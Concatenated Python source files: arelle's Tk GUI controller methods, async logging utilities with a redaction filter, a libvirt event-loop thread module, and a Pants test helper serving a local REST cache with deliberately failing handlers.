def quit(self, event=None, restartAfterQuit=False):
    """Shut down the application, persisting window geometry/state to config.

    restartAfterQuit: when True, sets the module-level restartMain flag so
    main()'s loop creates a fresh application after this one exits.
    """
    if self.okayToContinue():
        self.modelManager.close()
        logging.shutdown()
        global restartMain
        restartMain = restartAfterQuit
        state = self.parent.state()
        if state == "normal":
            # only a normal (un-zoomed) window has a meaningful geometry string
            self.config["windowGeometry"] = self.parent.geometry()
        if state in ("normal", "zoomed"):
            self.config["windowState"] = state
        if self.isMSW: adjustW = 4; adjustH = 6 # tweak to prevent splitter regions from growing on reloading
        elif self.isMac: adjustW = 54; adjustH = 39
        else: adjustW = 2; adjustH = 2 # linux (tested on ubuntu)
        self.config["tabWinTopLeftSize"] = (self.tabWinTopLeft.winfo_width() - adjustW,
                                            self.tabWinTopLeft.winfo_height() - adjustH)
        # base-class close saves the (now updated) config
        super(CntlrWinMain, self).close(saveConfig=True)
        self.parent.unbind_all(())
        self.parent.destroy()
        if self.logFile:
            self.logFile.close()
            self.logFile = None
def restart(self, event=None):
    """Quit the application while asking the outer main loop to relaunch it."""
    self.quit(event, restartAfterQuit=True)
def setWorkOffline(self, *args):
    """Sync the work-offline menu checkbox into the web cache and config."""
    offline = self.workOffline.get()
    self.webCache.workOffline = offline
    self.config["workOffline"] = offline
    self.saveConfig()
def confirmClearWebCache(self):
    """Ask the user for confirmation, then clear the internet cache on a thread."""
    if tkinter.messagebox.askyesno(
            _("arelle - Clear Internet Cache"),
            _("Are you sure you want to clear the internet cache?"),
            parent=self.parent):
        def backgroundClearCache():
            # clearing can be slow; keep the UI responsive
            self.showStatus(_("Clearing internet cache"))
            self.webCache.clear()
            self.showStatus(_("Internet cache cleared"), 5000)
        thread = threading.Thread(target=lambda: backgroundClearCache())
        thread.daemon = True
        thread.start()
def manageWebCache(self):
    """Open the web-cache directory in the platform's file browser (best effort)."""
    # pick the platform-specific "open a folder" command
    if sys.platform.startswith("win"):
        command = 'explorer'
    elif sys.platform in ("darwin", "macos"):
        command = 'open'
    else: # linux/unix
        command = 'xdg-open'
    try:
        subprocess.Popen([command, self.webCache.cacheDir])
    except OSError:
        # narrowed from bare except: the opener may be missing/unlaunchable;
        # ignore, but no longer swallow KeyboardInterrupt/SystemExit
        pass
def setupProxy(self):
    """Show the proxy dialog; apply and persist any settings the user enters."""
    from arelle.DialogUserPassword import askProxy
    proxySettings = askProxy(self.parent, self.config.get("proxySettings"))
    if proxySettings:
        self.webCache.resetProxies(proxySettings)
        self.config["proxySettings"] = proxySettings
        self.saveConfig()
def setValidateDisclosureSystem(self, *args):
    """Sync the disclosure-system validation flag from the menu checkbox."""
    enabled = self.validateDisclosureSystem.get()
    self.modelManager.validateDisclosureSystem = enabled
    self.config["validateDisclosureSystem"] = enabled
    self.saveConfig()
    if enabled and not (self.modelManager.disclosureSystem and self.modelManager.disclosureSystem.selection):
        # enabled but no disclosure system chosen yet: prompt for one
        self.selectDisclosureSystem()
    self.setValidateTooltipText()
def selectDisclosureSystem(self, *args):
    """Open the disclosure-system chooser and persist the user's selection."""
    from arelle import DialogOpenArchive
    self.config["disclosureSystem"] = DialogOpenArchive.selectDisclosureSystem(self, self.modelManager.disclosureSystem)
    self.saveConfig()
    self.setValidateTooltipText()
def formulaParametersDialog(self, *args):
    """Open the formula-parameters dialog, then refresh the validate tooltip."""
    DialogFormulaParameters.getParameters(self)
    self.setValidateTooltipText()
def rssWatchOptionsDialog(self, *args):
    """Open the RSS-watch options dialog."""
    from arelle import DialogRssWatch
    DialogRssWatch.getOptions(self)
# find or open rssWatch view
def rssWatchControl(self, start=False, stop=False, close=False):
    """Start or stop watching the configured RSS feed.

    Exactly one of start/stop is expected True.  Returns False when no feed
    source uri has been configured.  (`close` is accepted but unused here —
    presumably handled by callers; TODO confirm.)
    """
    from arelle.ModelDocument import Type
    from arelle import WatchRss
    if not self.modelManager.rssWatchOptions.get("feedSourceUri"):
        tkinter.messagebox.showwarning(_("RSS Watch Control Error"),
            _("RSS Feed is not set up, please select options and select feed"),
            parent=self.parent)
        return False
    # locate an already-loaded model for this feed, if any
    rssModelXbrl = None
    for loadedModelXbrl in self.modelManager.loadedModelXbrls:
        if (loadedModelXbrl.modelDocument.type == Type.RSSFEED and
                loadedModelXbrl.modelDocument.uri == self.modelManager.rssWatchOptions.get("feedSourceUri")):
            rssModelXbrl = loadedModelXbrl
            break
    #not loaded
    if start:
        if not rssModelXbrl:
            rssModelXbrl = self.modelManager.create(Type.RSSFEED, self.modelManager.rssWatchOptions.get("feedSourceUri"))
            self.showLoadedXbrl(rssModelXbrl, False)
        if not hasattr(rssModelXbrl,"watchRss"):
            WatchRss.initializeWatcher(rssModelXbrl)
        rssModelXbrl.watchRss.start()
    elif stop:
        if rssModelXbrl and rssModelXbrl.watchRss:
            rssModelXbrl.watchRss.stop()
# for ui thread option updating
def rssWatchUpdateOption(self, latestPubDate=None):
    """Queue an RSS-watch option update to run on the UI thread."""
    work = (self.uiRssWatchUpdateOption, [latestPubDate])
    self.uiThreadQueue.put(work)
# ui thread rssWatchUpdateOption
def uiRssWatchUpdateOption(self, latestPubDate):
    """UI-thread half: persist the newest RSS pubDate into the config."""
    if not latestPubDate:
        return
    options = self.modelManager.rssWatchOptions
    options["latestPubDate"] = latestPubDate
    self.config["rssWatchOptions"] = options
    self.saveConfig()
def languagesDialog(self, *args):
    """Prompt for a label-language override; persist it and reload views."""
    override = self.lang if self.lang != self.modelManager.defaultLang else ""
    import tkinter.simpledialog
    newValue = tkinter.simpledialog.askstring(_("arelle - Labels language code setting"),
        _("The system default language is: {0} \n\n"
          "You may override with a different language for labels display. \n\n"
          "Current language override code: {1} \n"
          "(Leave empty to use the system default language.)").format(
            self.modelManager.defaultLang, override),
        parent=self.parent)
    if newValue is not None:
        # None means the dialog was cancelled; empty string clears the override
        self.config["labelLangOverride"] = newValue
        if newValue:
            self.lang = newValue
        else:
            self.lang = self.modelManager.defaultLang
        if self.modelManager.modelXbrl and self.modelManager.modelXbrl.modelDocument:
            self.showLoadedXbrl(self.modelManager.modelXbrl, True) # reload views
        self.saveConfig()
def setValidateTooltipText(self):
    """Recompute the Validate button's tooltip from the current model/options."""
    if self.modelManager.modelXbrl and not self.modelManager.modelXbrl.isClosed and self.modelManager.modelXbrl.modelDocument is not None:
        valType = self.modelManager.modelXbrl.modelDocument.type
        if valType in (ModelDocument.Type.SCHEMA, ModelDocument.Type.LINKBASE):
            valName = "DTS"
        else:
            valName = ModelDocument.Type.typeName[valType]
        if valType == ModelDocument.Type.VERSIONINGREPORT:
            v = _("Validate versioning report")
        else:
            # compose the optional calc-linkbase and UTR check descriptions
            if self.modelManager.validateCalcLB:
                if self.modelManager.validateInferDecimals:
                    c = _("\nCheck calculations (infer decimals)")
                else:
                    c = _("\nCheck calculations (infer precision)")
            else:
                c = ""
            if self.modelManager.validateUtr:
                u = _("\nCheck unit type registry")
            else:
                u = ""
            if self.modelManager.validateDisclosureSystem:
                v = _("Validate {0}\nCheck disclosure system rules\n{1}{2}{3}").format(
                    valName, self.modelManager.disclosureSystem.selection,c,u)
            else:
                v = _("Validate {0}{1}{2}").format(valName, c, u)
    else:
        # no open document: generic tooltip
        v = _("Validate")
    self.validateTooltipText.set(v)
def setValidateCalcLB(self, *args):
    """Sync the calculation-linkbase validation flag from the menu checkbox."""
    enabled = self.validateCalcLB.get()
    self.modelManager.validateCalcLB = enabled
    self.config["validateCalcLB"] = enabled
    self.saveConfig()
    self.setValidateTooltipText()
def setValidateInferDecimals(self, *args):
    """Sync the infer-decimals (vs precision) flag from the menu checkbox."""
    enabled = self.validateInferDecimals.get()
    self.modelManager.validateInferDecimals = enabled
    self.config["validateInferDecimals"] = enabled
    self.saveConfig()
    self.setValidateTooltipText()
def setValidateUtr(self, *args):
    """Sync the unit-type-registry validation flag from the menu checkbox."""
    enabled = self.validateUtr.get()
    self.modelManager.validateUtr = enabled
    self.config["validateUtr"] = enabled
    self.saveConfig()
    self.setValidateTooltipText()
def setCollectProfileStats(self, *args):
    """Sync the profile-statistics collection flag from the menu checkbox."""
    enabled = self.collectProfileStats.get()
    self.modelManager.collectProfileStats = enabled
    self.config["collectProfileStats"] = enabled
    self.saveConfig()
def find(self, *args):
    """Open the Find dialog for the current model."""
    from arelle.DialogFind import find
    find(self)
def helpAbout(self, event=None):
    """Show the About dialog with version, license, and included-library credits."""
    from arelle import DialogAbout, Version
    DialogAbout.about(self.parent,
        _("About arelle"),
        os.path.join(self.imagesDir, "arelle32.gif"),
        _("arelle\u00ae {0} {1}bit {2}\n"
          "An open source XBRL platform\n"
          "\u00a9 2010-2013 Mark V Systems Limited\n"
          "All rights reserved\nhttp://www.arelle.org\nsupport@arelle.org\n\n"
          "Licensed under the Apache License, Version 2.0 (the \"License\"); "
          "you may not use this file except in compliance with the License. "
          "You may obtain a copy of the License at\n\n"
          "http://www.apache.org/licenses/LICENSE-2.0\n\n"
          "Unless required by applicable law or agreed to in writing, software "
          "distributed under the License is distributed on an \"AS IS\" BASIS, "
          "WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. "
          "See the License for the specific language governing permissions and "
          "limitations under the License."
          "\n\nIncludes:"
          "\n   Python\u00ae \u00a9 2001-2013 Python Software Foundation"
          "\n   PyParsing \u00a9 2003-2013 Paul T. McGuire"
          "\n   lxml \u00a9 2004 Infrae, ElementTree \u00a9 1999-2004 by Fredrik Lundh"
          "\n   xlrd \u00a9 2005-2013 Stephen J. Machin, Lingfo Pty Ltd, \u00a9 2001 D. Giffin, \u00a9 2000 A. Khan"
          "\n   xlwt \u00a9 2007 Stephen J. Machin, Lingfo Pty Ltd, \u00a9 2005 R. V. Kiseliov"
          "{3}"
          )
        .format(self.__version__, self.systemWordSize, Version.version,
                _("\n   Bottle \u00a9 2011-2013 Marcel Hellkamp") if self.hasWebServer else ""))
# worker threads addToLog
def addToLog(self, message, messageCode="", file="", level=logging.INFO):
    """Queue a log message for display on the UI thread (safe from workers)."""
    entry = (self.uiAddToLog, [message])
    self.uiThreadQueue.put(entry)
# ui thread addToLog
def uiAddToLog(self, message):
    """Append a message to the log pane (UI thread only).

    Appending is best-effort: the log view may not exist yet during startup
    or may already be destroyed during shutdown.
    """
    try:
        self.logView.append(message)
    except Exception:
        # narrowed from bare except: still best-effort, but no longer
        # swallows KeyboardInterrupt/SystemExit
        pass
def logClear(self, *ignore):
    """Erase all text from the log pane."""
    view = self.logView
    view.clear()
def logSelect(self, *ignore):
    """Bring the log pane's tab to the front."""
    view = self.logView
    view.select()
def logSaveToFile(self, *ignore):
    """Prompt for a filename and save the log pane's contents to it.

    Returns False when the user cancels the dialog.
    """
    filename = self.uiFileDialog("save",
        title=_("arelle - Save Messages Log"),
        initialdir=".",
        filetypes=[(_("Txt file"), "*.txt")],
        defaultextension=".txt")
    if not filename:
        return False
    try:
        self.logView.saveToFile(filename)
    except (IOError, EnvironmentError) as err:
        tkinter.messagebox.showwarning(_("arelle - Error"),
            _("Failed to save {0}:\n{1}").format(
                filename, err),
            parent=self.parent)
    # NOTE(review): returns True even when the save failed above (the user
    # has already been warned) — confirm callers don't rely on this value.
    return True;
# worker threads viewModelObject
def viewModelObject(self, modelXbrl, objectId):
    """Ask the UI thread to select/show the given model object."""
    self.waitForUiThreadQueue()  # let pending view updates finish first
    work = (self.uiViewModelObject, [modelXbrl, objectId])
    self.uiThreadQueue.put(work)
# ui thread viewModelObject
def uiViewModelObject(self, modelXbrl, objectId):
    """UI-thread half of viewModelObject: delegate selection to the model."""
    modelXbrl.viewModelObject(objectId)
# worker threads reloadViews
def reloadViews(self, modelXbrl):
    """Queue a refresh of all of modelXbrl's open views on the UI thread."""
    work = (self.uiReloadViews, [modelXbrl])
    self.uiThreadQueue.put(work)
# ui thread reloadViews
def uiReloadViews(self, modelXbrl):
    """UI-thread half: redraw each open view of the model."""
    for openView in modelXbrl.views:
        openView.view()
# worker threads showStatus
def showStatus(self, message, clearAfter=None):
    """Queue a status-bar update to run on the UI thread."""
    work = (self.uiShowStatus, [message, clearAfter])
    self.uiThreadQueue.put(work)
# ui thread showStatus
def uiClearStatusTimerEvent(self):
    """Timer callback: blank the status bar if the clear-timer is still wanted."""
    timer_pending = self.statusbarTimerId
    if timer_pending:
        self.statusbar["text"] = ""
    # the timer has fired (or was disowned); forget its id either way
    self.statusbarTimerId = None
def uiShowStatus(self, message, clearAfter=None):
    """UI-thread half: set the status-bar text, optionally auto-clearing later."""
    if self.statusbarTimerId:
        # a pending clear-timer would wipe the new message; disown it
        self.statusbarTimerId = None
    self.statusbar["text"] = message
    wants_auto_clear = clearAfter is not None and clearAfter > 0
    if wants_auto_clear:
        self.statusbarTimerId = self.statusbar.after(clearAfter, self.uiClearStatusTimerEvent)
# web authentication password request
def internet_user_password(self, host, realm):
    """Prompt (on the UI thread) for a username/password; block until answered.

    Called from worker threads by the web cache; the dialog sets `untilDone`
    and places its answer in `result` before this returns.
    """
    from arelle.DialogUserPassword import askUserPassword
    untilDone = threading.Event()
    result = []
    self.uiThreadQueue.put((askUserPassword, [self.parent, host, realm, untilDone, result]))
    untilDone.wait()
    return result[0]
# web file login requested
def internet_logon(self, url, quotedUrl, dialogCaption, dialogText):
    """Prompt (on the UI thread) for a web-site logon; block until answered."""
    from arelle.DialogUserPassword import askInternetLogon
    untilDone = threading.Event()
    result = []
    self.uiThreadQueue.put((askInternetLogon, [self.parent, url, quotedUrl, dialogCaption, dialogText, untilDone, result]))
    untilDone.wait()
    return result[0]
def waitForUiThreadQueue(self):
    """Poll (up to ~2 seconds) until the UI thread's callback queue drains."""
    attempts = 0
    while attempts < 40 and not self.uiThreadQueue.empty():
        time.sleep(0.05)
        attempts += 1
def uiThreadChecker(self, widget, delayMsecs=100): # 10x per second
    """Drain queued UI callbacks on the main thread, then re-arm itself."""
    # process callback on main (UI) thread
    while not self.uiThreadQueue.empty():
        try:
            (callback, args) = self.uiThreadQueue.get(block=False)
        except queue.Empty:
            # a race emptied the queue between the check and the get; harmless
            pass
        else:
            callback(*args)
    # reschedule this checker via tkinter's timer
    widget.after(delayMsecs, lambda: self.uiThreadChecker(widget))
def uiFileDialog(self, action, title=None, initialdir=None, filetypes=[], defaultextension=None, owner=None, multiple=False, parent=None):
    """Show a platform-appropriate open/save file dialog.

    action: "open" or "save".
    multiple: for "open", allow multiple selection; returns a list of names.
    Uses win32gui's native dialogs when available, tkinter otherwise.
    """
    if parent is None: parent = self.parent
    if multiple and action == "open": # return as simple list of file names
        multFileNames = tkinter.filedialog.askopenfilename(
            multiple=True,
            title=title,
            initialdir=initialdir,
            filetypes=[] if self.isMac else filetypes,
            defaultextension=defaultextension,
            parent=parent)
        if self.isMac:
            return multFileNames
        return re.findall("[{]([^}]+)[}]", # multiple returns "{file1} {file2}..."
                          multFileNames)
    elif self.hasWin32gui:
        import win32gui
        try:
            filename, filter, flags = {"open":win32gui.GetOpenFileNameW,
                                       "save":win32gui.GetSaveFileNameW}[action](
                hwndOwner=(owner if owner else parent).winfo_id(),
                hInstance=win32gui.GetModuleHandle(None),
                Filter='\0'.join(e for t in filetypes+['\0'] for e in t),
                MaxFile=4096,
                InitialDir=initialdir,
                Title=title,
                DefExt=defaultextension)
            return filename
        except win32gui.error:
            # user cancelled (or dialog failed); treat as no selection
            return ''
    else:
        return {"open":tkinter.filedialog.askopenfilename,
                "save":tkinter.filedialog.asksaveasfilename}[action](
            title=title,
            initialdir=initialdir,
            filetypes=[] if self.isMac else filetypes,
            defaultextension=defaultextension,
            parent=parent)
from arelle import DialogFormulaParameters
class WinMainLogHandler(logging.Handler):
    """logging.Handler that routes formatted log records into the GUI log pane."""
    def __init__(self, cntlr):
        super(WinMainLogHandler, self).__init__()
        self.cntlr = cntlr
        #formatter = logging.Formatter("%(asctime)s - %(name)s - %(levelname)s - %(message)s - %(file)s %(sourceLine)s")
        formatter = Cntlr.LogFormatter("[%(messageCode)s] %(message)s - %(file)s")
        self.setFormatter(formatter)
    def flush(self):
        ''' Nothing to flush '''
    def emit(self, logRecord):
        # add to logView
        msg = self.format(logRecord)
        try:
            self.cntlr.addToLog(msg)
        except:
            # best-effort: the GUI may be gone at shutdown — TODO confirm
            # whether narrowing to Exception is safe here
            pass
class TkinterCallWrapper:
    """Replacement for internal tkinter class. Stores function to call when some user
    defined Tcl function is called e.g. after an event occurred.

    Unlike tkinter's default wrapper, exceptions raised by the callback are
    shown to the user in an error dialog instead of going to stderr.
    """
    def __init__(self, func, subst, widget):
        """Store FUNC, SUBST and WIDGET as members."""
        self.func = func
        self.subst = subst
        self.widget = widget
    def __call__(self, *args):
        """Apply first function SUBST to arguments, than FUNC."""
        try:
            if self.subst:
                args = self.subst(*args)
            return self.func(*args)
        except SystemExit as msg:
            # let application exit propagate
            raise SystemExit(msg)
        except Exception:
            # this was tkinter's standard coding: self.widget._report_exception()
            exc_type, exc_value, exc_traceback = sys.exc_info()
            msg = ''.join(traceback.format_exception_only(exc_type, exc_value))
            tracebk = ''.join(traceback.format_tb(exc_traceback, limit=7))
            tkinter.messagebox.showerror(_("Exception"),
                _("{0}\nCall trace\n{1}").format(msg, tracebk))
def main():
    """Create the Tk application and run it, restarting while requested."""
    # this is the entry called by arelleGUI.pyw for windows
    global restartMain
    while restartMain:
        restartMain = False  # quit(restartAfterQuit=True) sets it back to loop again
        application = Tk()
        cntlrWinMain = CntlrWinMain(application)
        application.protocol("WM_DELETE_WINDOW", cntlrWinMain.quit)
        application.mainloop()
if __name__ == "__main__":
    # this is the entry called by MacOS open and MacOS shell scripts
    # check if ARELLE_ARGS are used to emulate command line operation
    if os.getenv("ARELLE_ARGS"):
        # command line mode
        from arelle import CntlrCmdLine
        CntlrCmdLine.main()
    else:
        # GUI mode
        main()
logging.py | """Logging utilities."""
import asyncio
from asyncio.events import AbstractEventLoop
from functools import partial, wraps
import inspect
import logging
import threading
import traceback
from typing import Any, Callable, Coroutine, Optional
class HideSensitiveDataFilter(logging.Filter):
    """Filter that redacts a sensitive substring from log messages."""

    def __init__(self, text: str) -> None:
        """Initialize sensitive data filter with the text to redact."""
        super().__init__()
        self.text = text

    def filter(self, record: logging.LogRecord) -> bool:
        """Hide sensitive data in messages; always lets the record through."""
        # record.msg is not guaranteed to be a str (callers may log arbitrary
        # objects); guard to avoid an AttributeError inside the logging machinery.
        if isinstance(record.msg, str):
            record.msg = record.msg.replace(self.text, "*******")
        return True
# pylint: disable=invalid-name
class AsyncHandler:
    """Logging handler wrapper to add an async layer.

    Records are queued onto the wrapped event loop's asyncio.Queue and
    drained by a dedicated thread, so emitting never blocks the caller.
    A queued None sentinel tells the worker thread to close and exit.
    """

    def __init__(self, loop: AbstractEventLoop, handler: logging.Handler) -> None:
        """Initialize async logging handler wrapper."""
        self.handler = handler
        self.loop = loop
        # NOTE(review): asyncio.Queue(loop=...) was deprecated in 3.8 and
        # removed in 3.10 — confirm the supported interpreter range.
        self._queue: asyncio.Queue = asyncio.Queue(loop=loop)
        self._thread = threading.Thread(target=self._process)

        # Delegate from handler
        self.setLevel = handler.setLevel
        self.setFormatter = handler.setFormatter
        self.addFilter = handler.addFilter
        self.removeFilter = handler.removeFilter
        self.filter = handler.filter
        self.flush = handler.flush
        self.handle = handler.handle
        self.handleError = handler.handleError
        self.format = handler.format

        self._thread.start()

    def close(self) -> None:
        """Wrap close to handler."""
        # emitting the None sentinel makes _process close the real handler
        self.emit(None)

    async def async_close(self, blocking: bool = False) -> None:
        """Close the handler.

        When blocking=True, will wait till closed.
        """
        await self._queue.put(None)

        if blocking:
            while self._thread.is_alive():
                await asyncio.sleep(0)

    def emit(self, record: Optional[logging.LogRecord]) -> None:
        """Process a record."""
        ident = self.loop.__dict__.get("_thread_ident")

        # inside eventloop
        if ident is not None and ident == threading.get_ident():
            self._queue.put_nowait(record)
        # from a thread/executor
        else:
            self.loop.call_soon_threadsafe(self._queue.put_nowait, record)

    def __repr__(self) -> str:
        """Return the string names."""
        return str(self.handler)

    def _process(self) -> None:
        """Process log in a thread."""
        try:
            while True:
                # hop onto the event loop to await the queue from this thread
                record = asyncio.run_coroutine_threadsafe(
                    self._queue.get(), self.loop
                ).result()
                if record is None:
                    self.handler.close()
                    return
                self.handler.emit(record)
        except asyncio.CancelledError:
            self.handler.close()

    def createLock(self) -> None:
        """Ignore lock stuff."""
        pass

    def acquire(self) -> None:
        """Ignore lock stuff."""
        pass

    def release(self) -> None:
        """Ignore lock stuff."""
        pass

    @property
    def level(self) -> int:
        """Wrap property level to handler."""
        return self.handler.level

    @property
    def formatter(self) -> Optional[logging.Formatter]:
        """Wrap property formatter to handler."""
        return self.handler.formatter

    @property
    def name(self) -> str:
        """Wrap property set_name to handler."""
        return self.handler.get_name()  # type: ignore

    @name.setter
    def name(self, name: str) -> None:
        """Wrap property get_name to handler."""
        self.handler.set_name(name)  # type: ignore
def catch_log_exception(
    func: Callable[..., Any], format_err: Callable[..., Any], *args: Any
) -> Callable[[], None]:
    """Decorate a callback to catch and log exceptions.

    Works for both sync and async callables; the returned wrapper matches
    the (a)synchronicity of *func*.  format_err(*args) builds the friendly
    message that prefixes the logged traceback.
    """

    def log_exception(*args: Any) -> None:
        # attribute the log entry to the module that raised, not this one
        module = inspect.getmodule(inspect.stack()[1][0])
        if module is not None:
            module_name = module.__name__
        else:
            # If Python is unable to access the sources files, the call stack frame
            # will be missing information, so let's guard.
            # https://github.com/home-assistant/home-assistant/issues/24982
            module_name = __name__
        # Do not print the wrapper in the traceback
        frames = len(inspect.trace()) - 1
        exc_msg = traceback.format_exc(-frames)
        friendly_msg = format_err(*args)
        logging.getLogger(module_name).error("%s\n%s", friendly_msg, exc_msg)

    # Check for partials to properly determine if coroutine function
    check_func = func
    while isinstance(check_func, partial):
        check_func = check_func.func

    wrapper_func = None
    if asyncio.iscoroutinefunction(check_func):

        @wraps(func)
        async def async_wrapper(*args: Any) -> None:
            """Catch and log exception."""
            try:
                await func(*args)
            except Exception:  # pylint: disable=broad-except
                log_exception(*args)

        wrapper_func = async_wrapper
    else:

        @wraps(func)
        def wrapper(*args: Any) -> None:
            """Catch and log exception."""
            try:
                func(*args)
            except Exception:  # pylint: disable=broad-except
                log_exception(*args)

        wrapper_func = wrapper
    return wrapper_func
def catch_log_coro_exception(
    target: Coroutine[Any, Any, Any], format_err: Callable[..., Any], *args: Any
) -> Coroutine[Any, Any, Any]:
    """Decorate a coroutine to catch and log exceptions.

    Returns a new coroutine that awaits *target* and, on failure, logs
    format_err(*args) plus the traceback and yields None instead of raising.
    """

    async def coro_wrapper(*args: Any) -> Any:
        """Catch and log exception."""
        try:
            return await target
        except Exception:  # pylint: disable=broad-except
            # attribute the log entry to the module that raised
            module = inspect.getmodule(inspect.stack()[1][0])
            if module is not None:
                module_name = module.__name__
            else:
                # If Python is unable to access the sources files, the frame
                # will be missing information, so let's guard.
                # https://github.com/home-assistant/home-assistant/issues/24982
                module_name = __name__
            # Do not print the wrapper in the traceback
            frames = len(inspect.trace()) - 1
            exc_msg = traceback.format_exc(-frames)
            friendly_msg = format_err(*args)
            logging.getLogger(module_name).error("%s\n%s", friendly_msg, exc_msg)
            return None

    return coro_wrapper()
def async_create_catching_coro(target: Coroutine) -> Coroutine:
    """Wrap a coroutine to catch and log exceptions.

    The exception will be logged together with a stacktrace of where the
    coroutine was wrapped.

    target: target coroutine.
    """
    # capture the wrap-site stack now, so the eventual log shows where the
    # coroutine came from rather than where it failed
    trace = traceback.extract_stack()
    wrapped_target = catch_log_coro_exception(
        target,
        lambda *args: "Exception in {} called from\n {}".format(
            target.__name__,  # type: ignore  # NOTE(review): assumes the coroutine exposes __name__ — confirm
            "".join(traceback.format_list(trace[:-1])),
        ),
    )

    return wrapped_target
|
libvirt_events_thread.py | # Copyright (c) Microsoft Corporation.
# Licensed under the MIT license.
# To use libvirt callbacks, one has to setup a single process-wide event loop for
# libvirt. This module provisions the event loop in a python thread dedicated to
# handling libvirt events.
import asyncio
from threading import Event, Lock, Thread
from typing import Any, Callable, Optional
import libvirtaio # type: ignore
# Guards creation of the singleton events thread.
_callbacks_thread_lock = Lock()
# The single process-wide thread running the libvirt/asyncio event loop.
_callbacks_thread: Optional[Thread] = None
# Set once the events thread has finished initializing.
_callbacks_thread_running = Event()
# The asyncio loop owned by the events thread (set by _libvirt_events_thread).
_callbacks_loop: Optional[asyncio.AbstractEventLoop] = None
# Entry-point for the libvirt events thread.
def _libvirt_events_thread() -> None:
    """Own an asyncio loop, register it as libvirt's event impl, and run forever."""
    global _callbacks_loop

    # Provision this thread as an asyncio thread.
    loop = asyncio.new_event_loop()
    asyncio.set_event_loop(loop)
    _callbacks_loop = loop

    # Initialize this thread as the libvirt events thread.
    libvirtaio.virEventRegisterAsyncIOImpl()

    # Signal that thread is initialized.
    _callbacks_thread_running.set()

    # Run the asyncio loop.
    loop.run_forever()
def init() -> None:
    """Start the singleton libvirt events thread (once) and wait until ready."""
    global _callbacks_thread

    # Fast path: events thread already up and initialized.
    if _callbacks_thread_running.is_set():
        return

    with _callbacks_thread_lock:
        # Double-check under the lock before creating the thread.
        if not _callbacks_thread:
            worker = Thread(target=_libvirt_events_thread)
            worker.daemon = True
            worker.start()
            _callbacks_thread = worker

    # Block until the thread has provisioned its asyncio loop.
    _callbacks_thread_running.wait()
# Run a callback on the libvirt events thread.
def run_callback(callback: Callable[..., Any], *args: Any) -> asyncio.Handle:
    """Schedule *callback* on the events thread's loop; init() must have run."""
    assert _callbacks_thread_running.is_set()
    assert _callbacks_loop
    return _callbacks_loop.call_soon_threadsafe(callback, *args)
|
cache_server.py | # Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
import http.server
import os
import re
import socketserver
from contextlib import contextmanager
from multiprocessing import Process, Queue
from pants.testutil.file_test_util import exact_files
from pants.util.contextutil import pushd, temporary_dir
from pants.util.dirutil import safe_mkdir
# NB: All API methods should follow redirects, so we always inject one redirect for all handler
# methods before serving.
def redirect_once(func):
    """Decorator: answer the first request with a 307 redirect to a
    '/__redir__'-suffixed path, and serve the real handler only once the
    redirected path comes back. Exercises clients' redirect-following."""
    def wrapper(self):
        if not self.path.endswith("/__redir__"):
            # First visit: bounce the client to the marker URL.
            self.send_response(307, "Found")
            self.send_header("Location", os.path.join(self.path, "__redir__"))
            self.end_headers()
            return None
        # Redirected visit: strip the marker and dispatch to the real handler.
        self.path = os.path.dirname(self.path)
        return func(self)
    return wrapper
# A very trivial server that serves files under the cwd.
class SimpleRESTHandler(http.server.SimpleHTTPRequestHandler):
    """A minimal REST handler serving files under the cwd.

    GET and HEAD come from the base class; PUT writes the request body to
    the translated path, DELETE removes it. All verbs go through one
    redirect first (see redirect_once).
    """

    def __init__(self, request, client_address, server):
        super().__init__(request, client_address, server)

    @redirect_once
    def do_HEAD(self):
        return super().do_HEAD()

    @redirect_once
    def do_GET(self):
        return super().do_GET()

    @redirect_once
    def do_PUT(self):
        # Store the request body at the filesystem path the URL maps to.
        target = self.translate_path(self.path)
        length = int(self.headers.get("content-length"))
        body = self.rfile.read(length)
        safe_mkdir(os.path.dirname(target))
        with open(target, "wb") as sink:
            sink.write(body)
        self.send_response(200)
        self.end_headers()

    @redirect_once
    def do_DELETE(self):
        # Remove the file at the translated path; 404 if it does not exist.
        target = self.translate_path(self.path)
        if not os.path.exists(target):
            self.send_error(404, "File not found")
        else:
            os.unlink(target)
            self.send_response(200)
        self.end_headers()
class FailRESTHandler(http.server.SimpleHTTPRequestHandler):
    """Reject all requests."""

    def __init__(self, request, client_address, server):
        super().__init__(request, client_address, server)

    def _return_failed(self):
        # Every verb funnels here: respond 401 with no body.
        self.send_response(401, "Forced test failure")
        self.end_headers()

    @redirect_once
    def do_HEAD(self):
        return self._return_failed()

    @redirect_once
    def do_GET(self):
        return self._return_failed()

    @redirect_once
    def do_PUT(self):
        return self._return_failed()

    @redirect_once
    def do_DELETE(self):
        return self._return_failed()
class ConnectionErrorRESTHandler(FailRESTHandler):
    """Fail to connect to all requests."""
    def _return_failed(self):
        # Raising inside the handler aborts the request mid-flight, which a
        # client observes as a connection-level error rather than an HTTP status.
        raise Exception("Intentional connection failure!")
class TestCacheServer:
    """A wrapper class that represents the underlying REST server.

    To create a TestCacheServer, use the `cache_server` factory function.
    """

    def __init__(self, url, cache_root):
        self.url = url
        self._cache_root = cache_root

    def corrupt_artifacts(self, pattern):
        """Corrupts any artifacts matching the given pattern.

        Returns the number of files affected.
        """
        matcher = re.compile(pattern)
        corrupted = 0
        for rel_path in exact_files(self._cache_root, ignore_links=True):
            if matcher.match(rel_path):
                # Truncate the matching artifact to half its size.
                full_path = os.path.join(self._cache_root, rel_path)
                size = os.path.getsize(full_path)
                with open(full_path, "r+") as artifact:
                    artifact.truncate(size // 2)
                corrupted += 1
        return corrupted
def _cache_server_process(queue, return_failed, cache_root):
    """A pickleable top-level function to wrap a SimpleRESTHandler.

    We fork a separate process to avoid affecting the `cwd` of the requesting
    process. Reports the bound ephemeral port back through `queue`.

    return_failed: False serves files, True rejects with 401, and
    "connection-error" aborts every request.
    """
    httpd = None
    try:
        with temporary_dir() as tmpdir:
            cache_root = cache_root if cache_root else tmpdir
            with pushd(cache_root):  # SimpleRESTHandler serves from the cwd.
                if return_failed is True:
                    handler = FailRESTHandler
                elif return_failed is False:
                    handler = SimpleRESTHandler
                elif return_failed == "connection-error":
                    handler = ConnectionErrorRESTHandler
                else:
                    # Previously an unrecognized value left `handler` unbound,
                    # producing a NameError far from the real mistake.
                    raise ValueError(f"Unrecognized return_failed value: {return_failed!r}")
                # Port 0 asks the OS for any free port.
                httpd = socketserver.TCPServer(("localhost", 0), handler)
                port = httpd.server_address[1]
                queue.put(port)
                httpd.serve_forever()
